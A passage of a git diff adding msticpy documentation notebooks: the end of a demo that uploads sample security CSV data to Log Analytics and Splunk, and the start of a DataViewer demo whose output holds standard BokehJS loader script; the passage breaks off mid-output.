+    "We can now upload a file to our Workspace using the same Uploader. We simply pass the path to the file we want to upload, and we can also pass a table name for the data to be uploaded to."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Upload response code: 200\n",
+      "Upload to upload_demo complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "la_up.upload_file(file_path='data/alertlist.csv', table_name='upload_demo')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Upload a folder\n",
+    "We can now upload a file to our Workspace using the same Uploader. We simply pass the the path to the folder we want to upload file from. In this case we aren't going to pass a table name, in which case the name will be generated automatically for each file from the file's name. With a folder we get a progress bar showing the progress uploading each file."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "b59b3e2a33a14d96bce3e34220ea84fc",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Files', max=10.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Upload response code: 200\n",
+      "Upload to alertlist complete\n",
+      "Upload response code: 200\n",
+      "Upload to az_net_flows complete\n",
+      "Upload response code: 200\n",
+      "Upload to demo_exchange_data complete\n",
+      "Upload response code: 200\n",
+      "Upload to host_logons complete\n",
+      "Upload response code: 200\n",
+      "Upload to ip_locs complete\n",
+      "Upload response code: 200\n",
+      "Upload to processes_on_host complete\n",
+      "Upload response code: 200\n",
+      "Upload to raw_network complete\n",
+      "Upload response code: 200\n",
+      "Upload to sample_alerts complete\n",
+      "Upload response code: 200\n",
+      "Upload to TimeSeriesDemo complete\n",
+      "Upload response code: 200\n",
+      "Upload to ti_data complete\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "la_up.upload_folder(folder_path='data/')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Splunk Data Uploader\n",
+    "The Splunk Uploader functions in the same manner as the LogAnalytics one. <br>\n",
+    "Below we collect some details required for our uploader, instanciate our Splunk data uploader and pass our DataFrame loaded above to be uploaded.\n",
+    "We are setting the debug flag on our uploader so we can get some additional details on our upload progress.<br>\n",
+    "When uploading our DataFrame the only difference is that as well as providing a table name (which is represneted as sourcetype in Splunk), we also need to pass a Splunk index that we want to data uploaded to. Also as Splunk uploads data a line at a time we get a progress bar for the file as it uploads."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "3366d467cc4746bf83c9da070e56ecf7",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='', description='Splunk host')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d5d66a08cc4340f5b4f924b78a05734b",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Text(value='', description='Username')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "55d2699324d14e69a87cf89ea73a7cb6",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "Password(description='Password')"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "sp_host = widgets.Text(description='Splunk host')\n",
+    "sp_user = widgets.Text(description='Username')\n",
+    "sp_pwrd = widgets.Password(description='Password')\n",
+    "display(sp_host)\n",
+    "display(sp_user)\n",
+    "display(sp_pwrd)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 3,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "connected\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "f1bda0f665da4e449fbc172f02955e59",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=460.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Instanciate our Uploader\n",
+    "spup = SplunkUploader(username=sp_user.value, host=sp_host.value, password=sp_pwrd.value, debug=True)\n",
+    "# Upload our DataFrame\n",
+    "spup.upload_df(data=df, table_name='upload_test', index_name='upload_test')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Upload a file\n",
+    "We can now upload a file to our Workspace using the same Uploader. We simply pass the path to the file we want to upload along with the index name, and we can also pass a table name for the data to be uploaded to."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Exception reporting mode: Verbose\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "140a61fa3eda4b1793f6f4f9aff7d847",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=189.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n"
+     ]
+    }
+   ],
+   "source": [
+    "spup.upload_file(file_path='data/alertlist.csv', index_name='upload_demo', table_name='upload_demo')"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Upload a folder\n",
+    "We can now upload a file to our Workspace using the same Uploader. We simply pass the the path to the folder we want to upload file from. In this case we aren't going to pass a table name, in which case the name will be generated automatically for each file from the file's name however we still need to pass and index name."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d357e8d4f1804e1783055190e70eed65",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Files', max=10.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "76a8427b7919484199701613f624d648",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=189.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\alertlist.csv uploaded to alertlist\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "7b6bec5403424259b23791440925ac96",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=460.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\az_net_flows.csv uploaded to az_net_flows\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "b13fbc6393a4412fa2db7ba1382178e0",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=1334.0, style=ProgressStyle(description_width=…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\demo_exchange_data.csv uploaded to demo_exchange_data\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ba139fa3842a41e9a569481e4b539ae2",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=14.0, style=ProgressStyle(description_width='i…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\host_logons.csv uploaded to host_logons\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "56c8a58f26234be7b034153b114bf62e",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=87.0, style=ProgressStyle(description_width='i…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\ip_locs.csv uploaded to ip_locs\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "1ea09392e762426e98ceeb8596c5bc8e",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=363.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\processes_on_host.csv uploaded to processes_on_host\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "14d86e700fad482da55d6c9f32db9d49",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=32.0, style=ProgressStyle(description_width='i…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\raw_network.csv uploaded to raw_network\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "ff7221ded09a4b698567e9335ca12de2",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=78.0, style=ProgressStyle(description_width='i…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\sample_alerts.csv uploaded to sample_alerts\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "d5fe6b46a1cd4469b6e2a5a722903b3f",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=840.0, style=ProgressStyle(description_width='…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\TimeSeriesDemo.csv uploaded to TimeSeriesDemo\n"
+     ]
+    },
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "b5ae2edc49eb448fa97ce4ef9ce15d5a",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(FloatProgress(value=0.0, description='Rows', max=80.0, style=ProgressStyle(description_width='i…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\n",
+      "Upload complete\n",
+      "data\\ti_data.csv uploaded to ti_data\n",
+      "\n"
+     ]
+    }
+   ],
+   "source": [
+    "spup.upload_folder(folder_path='data/', index_name='upload_demo')    "
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": []
+  }
+ ],
+ "metadata": {
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/DataViewer.ipynb b/docs/notebooks/DataViewer.ipynb
new file mode 100644
index 000000000..4786b23f7
--- /dev/null
+++ b/docs/notebooks/DataViewer.ipynb
@@ -0,0 +1,6426 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Data Viewer\n",
+    "\n",
+    "This notebook demonstrates the use of the DataViewer control.\n",
+    "\n",
+    "It provides some basic features that let you browse pandas DataFrames more easily:\n",
+    "- Scrollable data viewer taking fixed amount of output cell space\n",
+    "- Sorting data by column\n",
+    "- Column selection\n",
+    "- Data filtering"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "#### Read in some data to demonstrate"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.nbtools.data_viewer import DataViewer\n",
+    "import pandas as pd\n",
+    "\n",
+    "data = pd.read_csv(\n",
+    "    \"./data/processes_on_host.csv\",\n",
+    "    index_col=0,\n",
+    "    parse_dates=[\"TimeGenerated\"],\n",
+    "    infer_datetime_format=True,\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Use the DataViewer to display a DataFrame"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
+       "      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n",
+       "      cell.notebook.kernel.execute(cmd, {\n",
+       "        iopub: {\n",
+       "          output: function(msg) {\n",
+       "            var id = msg.content.text.trim();\n",
+       "            if (id in Bokeh.index) {\n",
+       "              Bokeh.index[id].model.document.clear();\n",
+       "              delete Bokeh.index[id];\n",
+       "            }\n",
+       "          }\n",
+       "        }\n",
+       "      });\n",
+       "      // Destroy server and session\n",
+       "      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n",
+       "      cell.notebook.kernel.execute(cmd);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when a new output is added\n",
+       "   */\n",
+       "  function handleAddOutput(event, handle) {\n",
+       "    var output_area = handle.output_area;\n",
+       "    var output = handle.output;\n",
+       "\n",
+       "    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n",
+       "    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n",
+       "      return\n",
+       "    }\n",
+       "\n",
+       "    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n",
+       "\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n",
+       "      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n",
+       "      // store reference to embed id on output_area\n",
+       "      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n",
+       "    }\n",
+       "    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n",
+       "      var bk_div = document.createElement(\"div\");\n",
+       "      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n",
+       "      var script_attrs = bk_div.children[0].attributes;\n",
+       "      for (var i = 0; i < script_attrs.length; i++) {\n",
+       "        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n",
+       "        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n",
+       "      }\n",
+       "      // store reference to server id on output_area\n",
+       "      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  function register_renderer(events, OutputArea) {\n",
+       "\n",
+       "    function append_mime(data, metadata, element) {\n",
+       "      // create a DOM node to render to\n",
+       "      var toinsert = this.create_output_subarea(\n",
+       "        metadata,\n",
+       "        CLASS_NAME,\n",
+       "        EXEC_MIME_TYPE\n",
+       "      );\n",
+       "      this.keyboard_manager.register_events(toinsert);\n",
+       "      // Render to node\n",
+       "      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n",
+       "      render(props, toinsert[toinsert.length - 1]);\n",
+       "      element.append(toinsert);\n",
+       "      return toinsert\n",
+       "    }\n",
+       "\n",
+       "    /* Handle when an output is cleared or removed */\n",
+       "    events.on('clear_output.CodeCell', handleClearOutput);\n",
+       "    events.on('delete.Cell', handleClearOutput);\n",
+       "\n",
+       "    /* Handle when a new output is added */\n",
+       "    events.on('output_added.OutputArea', handleAddOutput);\n",
+       "\n",
+       "    /**\n",
+       "     * Register the mime type and append_mime function with output_area\n",
+       "     */\n",
+       "    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n",
+       "      /* Is output safe? */\n",
+       "      safe: true,\n",
+       "      /* Index of renderer in `output_area.display_order` */\n",
+       "      index: 0\n",
+       "    });\n",
+       "  }\n",
+       "\n",
+       "  // register the mime type if in Jupyter Notebook environment and previously unregistered\n",
+       "  if (root.Jupyter !== undefined) {\n",
+       "    var events = require('base/js/events');\n",
+       "    var OutputArea = require('notebook/js/outputarea').OutputArea;\n",
+       "\n",
+       "    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n",
+       "      register_renderer(events, OutputArea);\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n",
+       "    root._bokeh_timeout = Date.now() + 5000;\n",
+       "    root._bokeh_failed_load = false;\n",
+       "  }\n",
+       "\n",
+       "  var NB_LOAD_WARNING = {'data': {'text/html':\n",
+       "     \"<div style='background-color: #fdd'>\\n\"+\n",
+       "     \"<p>\\n\"+\n",
+       "     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n",
+       "     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n",
+       "     \"</p>\\n\"+\n",
+       "     \"<ul>\\n\"+\n",
+       "     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n",
+       "     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n",
+       "     \"</ul>\\n\"+\n",
+       "     \"<code>\\n\"+\n",
+       "     \"from bokeh.resources import INLINE\\n\"+\n",
+       "     \"output_notebook(resources=INLINE)\\n\"+\n",
+       "     \"</code>\\n\"+\n",
+       "     \"</div>\"}};\n",
+       "\n",
+       "  function display_loaded() {\n",
+       "    var el = document.getElementById(null);\n",
+       "    if (el != null) {\n",
+       "      el.textContent = \"BokehJS is loading...\";\n",
+       "    }\n",
+       "    if (root.Bokeh !== undefined) {\n",
+       "      if (el != null) {\n",
+       "        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n",
+       "      }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(display_loaded, 100)\n",
+       "    }\n",
+       "  }\n",
+       "\n",
+       "\n",
+       "  function run_callbacks() {\n",
+       "    try {\n",
+       "      root._bokeh_onload_callbacks.forEach(function(callback) {\n",
+       "        if (callback != null)\n",
+       "          callback();\n",
+       "      });\n",
+       "    } finally {\n",
+       "      delete root._bokeh_onload_callbacks\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: all callbacks have finished\");\n",
+       "  }\n",
+       "\n",
+       "  function load_libs(css_urls, js_urls, callback) {\n",
+       "    if (css_urls == null) css_urls = [];\n",
+       "    if (js_urls == null) js_urls = [];\n",
+       "\n",
+       "    root._bokeh_onload_callbacks.push(callback);\n",
+       "    if (root._bokeh_is_loading > 0) {\n",
+       "      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n",
+       "      return null;\n",
+       "    }\n",
+       "    if (js_urls == null || js_urls.length === 0) {\n",
+       "      run_callbacks();\n",
+       "      return null;\n",
+       "    }\n",
+       "    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n",
+       "    root._bokeh_is_loading = css_urls.length + js_urls.length;\n",
+       "\n",
+       "    function on_load() {\n",
+       "      root._bokeh_is_loading--;\n",
+       "      if (root._bokeh_is_loading === 0) {\n",
+       "        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n",
+       "        run_callbacks()\n",
+       "      }\n",
+       "    }\n",
+       "\n",
+       "    function on_error(url) {\n",
+       "      console.error(\"failed to load \" + url);\n",
+       "    }\n",
+       "\n",
+       "    for (let i = 0; i < css_urls.length; i++) {\n",
+       "      const url = css_urls[i];\n",
+       "      const element = document.createElement(\"link\");\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.rel = \"stylesheet\";\n",
+       "      element.type = \"text/css\";\n",
+       "      element.href = url;\n",
+       "      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n",
+       "      document.body.appendChild(element);\n",
+       "    }\n",
+       "\n",
+       "    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n",
+       "\n",
+       "    for (let i = 0; i < js_urls.length; i++) {\n",
+       "      const url = js_urls[i];\n",
+       "      const element = document.createElement('script');\n",
+       "      element.onload = on_load;\n",
+       "      element.onerror = on_error.bind(null, url);\n",
+       "      element.async = false;\n",
+       "      element.src = url;\n",
+       "      if (url in hashes) {\n",
+       "        element.crossOrigin = \"anonymous\";\n",
+       "        element.integrity = \"sha384-\" + hashes[url];\n",
+       "      }\n",
+       "      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n",
+       "      document.head.appendChild(element);\n",
+       "    }\n",
+       "  };\n",
+       "\n",
+       "  function inject_raw_css(css) {\n",
+       "    const element = document.createElement(\"style\");\n",
+       "    element.appendChild(document.createTextNode(css));\n",
+       "    document.body.appendChild(element);\n",
+       "  }\n",
+       "\n",
+       "  \n",
+       "  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n",
+       "  var css_urls = [];\n",
+       "  \n",
+       "\n",
+       "  var inline_js = [\n",
+       "    function(Bokeh) {\n",
+       "      Bokeh.set_log_level(\"info\");\n",
+       "    },\n",
+       "    function(Bokeh) {\n",
+       "    \n",
+       "    \n",
+       "    }\n",
+       "  ];\n",
+       "\n",
+       "  function run_inline_js() {\n",
+       "    \n",
+       "    if (root.Bokeh !== undefined || force === true) {\n",
+       "      \n",
+       "    for (var i = 0; i < inline_js.length; i++) {\n",
+       "      inline_js[i].call(root, root.Bokeh);\n",
+       "    }\n",
+       "    } else if (Date.now() < root._bokeh_timeout) {\n",
+       "      setTimeout(run_inline_js, 100);\n",
+       "    } else if (!root._bokeh_failed_load) {\n",
+       "      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n",
+       "      root._bokeh_failed_load = true;\n",
+       "    } else if (force !== true) {\n",
+       "      var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n",
+       "      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n",
+       "    }\n",
+       "\n",
+       "  }\n",
+       "\n",
+       "  if (root._bokeh_is_loading === 0) {\n",
+       "    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n",
+       "    run_inline_js();\n",
+       "  } else {\n",
+       "    load_libs(css_urls, js_urls, function() {\n",
+       "      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n",
+       "      run_inline_js();\n",
+       "    });\n",
+       "  }\n",
+       "}(window));"
+      ],
+      "application/vnd.bokehjs_load.v0+json": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  \n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(null);\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = 